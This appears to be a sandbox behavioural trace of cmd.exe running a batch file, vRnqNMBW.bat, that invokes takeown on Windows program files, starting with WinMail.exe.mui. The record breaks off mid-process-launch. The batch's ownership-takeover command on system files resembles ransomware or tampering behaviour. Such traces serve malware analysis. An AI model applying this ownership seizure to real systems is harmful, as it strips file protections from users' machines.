[0280.915] GetEnvironmentStringsW () returned 0xcbe348* [0280.915] FreeEnvironmentStringsA (penv="=") returned 1 [0280.915] DeleteProcThreadAttributeList (in: lpAttributeList=0xc6eed0 | out: lpAttributeList=0xc6eed0) [0280.915] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.915] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0280.961] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.961] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0280.961] _get_osfhandle (_FileHandle=0) returned 0x38 [0280.961] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0280.961] SetConsoleInputExeNameW () returned 0x1 [0280.961] GetConsoleOutputCP () returned 0x1b5 [0280.961] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0280.961] SetThreadUILanguage (LangId=0x0) returned 0x409 [0280.962] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc6f664, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0280.962] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0280.962] _get_osfhandle (_FileHandle=3) returned 0xb8 [0280.962] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0280.962] _get_osfhandle (_FileHandle=3) returned 0xb8 [0280.962] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0280.962] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc6f634, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xc6f634*=0xc2, lpOverlapped=0x0) returned 1 [0280.963] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0280.963] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0280.963] _get_osfhandle (_FileHandle=3) returned 0xb8 [0280.963] GetFileType (hFile=0xb8) returned 0x1 [0280.963] _get_osfhandle (_FileHandle=3) returned 0xb8 [0280.963] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0280.963] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0280.963] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0280.963] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0280.963] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0280.963] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0280.963] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0280.963] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0280.964] _tell (_FileHandle=3) returned 47 [0280.964] _close (_FileHandle=3) returned 0 [0280.964] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f3f8 | out: _Buffer="\r\n") returned 2 [0280.964] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.964] GetFileType (hFile=0x3c) returned 0x2 [0280.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.964] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d0 | out: lpMode=0xc6f3d0) returned 1 [0280.965] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.965] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f3e8*=0x2) returned 1 [0280.965] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0280.965] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.965] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xc6f3f4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0280.965] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xc6f3f4 | out: _Buffer=">") returned 1 [0280.965] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.965] GetFileType (hFile=0x3c) returned 0x2 [0280.965] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.965] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d4 | out: lpMode=0xc6f3d4) returned 1 [0280.966] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.966] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xc6f3ec, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xc6f3ec*=0x1e) returned 1 [0280.966] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.966] GetFileType (hFile=0x3c) returned 0x2 [0280.966] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.966] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f674 | out: lpMode=0xc6f674) returned 1 [0280.966] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.966] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcb78f0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xc6f68c, lpReserved=0x0 | out: lpBuffer=0xcb78f0*, lpNumberOfCharsWritten=0xc6f68c*=0x7) returned 1 [0280.966] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xc6f694 | out: _Buffer=" /F \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\" ") returned 58 [0280.966] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.966] GetFileType (hFile=0x3c) returned 0x2 [0280.966] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.966] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0280.967] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.967] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x3a) returned 1 [0280.967] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f6a8 | out: _Buffer="\r\n") returned 2 [0280.967] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.967] GetFileType (hFile=0x3c) returned 0x2 [0280.967] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0280.967] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f680 | out: lpMode=0xc6f680) returned 1 [0280.968] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.968] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f698, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f698*=0x2) returned 1 [0280.968] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0280.968] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0280.968] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0280.968] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0280.968] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0280.968] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0280.968] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0280.968] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0280.968] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0280.968] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0280.968] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0280.968] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0280.968] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0280.968] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0280.968] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0280.968] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0280.968] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0280.968] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0280.968] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0280.968] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0280.968] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0280.968] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0280.968] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0280.968] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0280.968] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0280.968] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0280.968] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0280.968] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0280.968] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0280.968] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0280.969] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0280.969] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0280.969] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0280.969] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0280.969] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0280.969] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0280.969] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0280.969] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0280.969] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0280.969] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0280.969] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0280.969] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0280.969] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0280.969] SetErrorMode (uMode=0x0) returned 0x0 [0280.969] SetErrorMode (uMode=0x1) returned 0x0 [0280.969] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbf930, lpFilePart=0xc6f444 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc6f444*="Desktop") returned 0x1d [0280.969] SetErrorMode (uMode=0x0) returned 0x1 [0280.969] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.969] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0280.969] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.969] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.970] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xffffffff [0280.970] GetLastError () returned 0x2 [0280.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.970] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xffffffff [0280.970] GetLastError () returned 0x2 [0280.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xcbcbb0 [0280.970] FindClose (in: hFindFile=0xcbcbb0 | out: hFindFile=0xcbcbb0) returned 1 [0280.970] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xffffffff [0280.971] GetLastError () returned 0x2 [0280.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xcbcbb0 [0280.971] FindClose (in: hFindFile=0xcbcbb0 | out: hFindFile=0xcbcbb0) returned 1 [0280.971] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0280.971] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0280.971] GetConsoleTitleW (in: lpConsoleTitle=0xc6f218, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.971] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0280.971] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0280.971] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0280.971] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0280.971] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0280.971] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0280.971] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0280.971] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0280.972] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0280.972] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0280.972] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0280.972] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0280.972] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0280.972] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0280.972] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0280.972] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0280.972] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0280.972] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0280.972] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0280.972] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0280.972] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0280.972] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0280.972] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0280.972] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0280.972] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0280.972] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0280.972] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0280.972] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0280.972] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0280.972] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0280.972] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0280.972] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0280.972] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0280.972] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0280.972] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0280.972] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0280.972] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0280.972] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0280.972] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0280.972] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0280.972] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0280.972] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0280.972] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0280.972] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0280.973] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0280.973] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0280.973] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0280.973] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0280.973] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0280.973] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0280.973] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0280.973] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0280.973] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0280.973] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0280.973] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0280.973] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0280.973] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0280.973] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0280.973] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0280.973] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0280.973] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0280.973] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0280.973] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0280.973] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0280.973] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0280.973] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0280.973] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0280.973] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0280.973] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0280.973] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0280.973] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0280.973] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0280.973] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0280.973] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0280.973] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0280.973] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0280.973] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0280.973] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0280.973] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0280.973] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0280.973] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0280.973] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0280.973] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0280.974] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0280.974] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0280.974] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0280.974] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0280.974] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0280.974] SetErrorMode (uMode=0x0) returned 0x0 [0280.974] SetErrorMode (uMode=0x1) returned 0x0 [0280.974] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbce28, lpFilePart=0xc6ed24 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc6ed24*="Desktop") returned 0x1d [0280.974] SetErrorMode (uMode=0x0) returned 0x1 [0280.974] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.974] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0280.974] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.974] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.975] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xffffffff [0280.975] GetLastError () returned 0x2 [0280.975] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.975] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xffffffff [0280.975] GetLastError () returned 0x2 [0280.975] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.975] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xcbfd88 [0280.975] FindClose (in: hFindFile=0xcbfd88 | out: hFindFile=0xcbfd88) returned 1 [0280.975] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xffffffff [0280.975] GetLastError () returned 0x2 [0280.976] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xcbfd88 [0280.976] FindClose (in: hFindFile=0xcbfd88 | out: hFindFile=0xcbfd88) returned 1 [0280.976] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0280.976] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0280.976] GetConsoleTitleW (in: lpConsoleTitle=0xc6efa4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.976] InitializeProcThreadAttributeList (in: lpAttributeList=0xc6eed0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc6eeb4 | out: lpAttributeList=0xc6eed0, lpSize=0xc6eeb4) returned 1 [0280.976] UpdateProcThreadAttribute (in: lpAttributeList=0xc6eed0, dwFlags=0x0, Attribute=0x60001, lpValue=0xc6eebc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc6eed0, lpPreviousValue=0x0) returned 1 [0280.976] GetStartupInfoW (in: lpStartupInfo=0xc6ef08 | out: lpStartupInfo=0xc6ef08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0280.976] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0280.976] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0280.976] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0280.976] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0280.976] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.976] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.976] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0280.976] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0280.977] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0280.977] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0280.977] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F 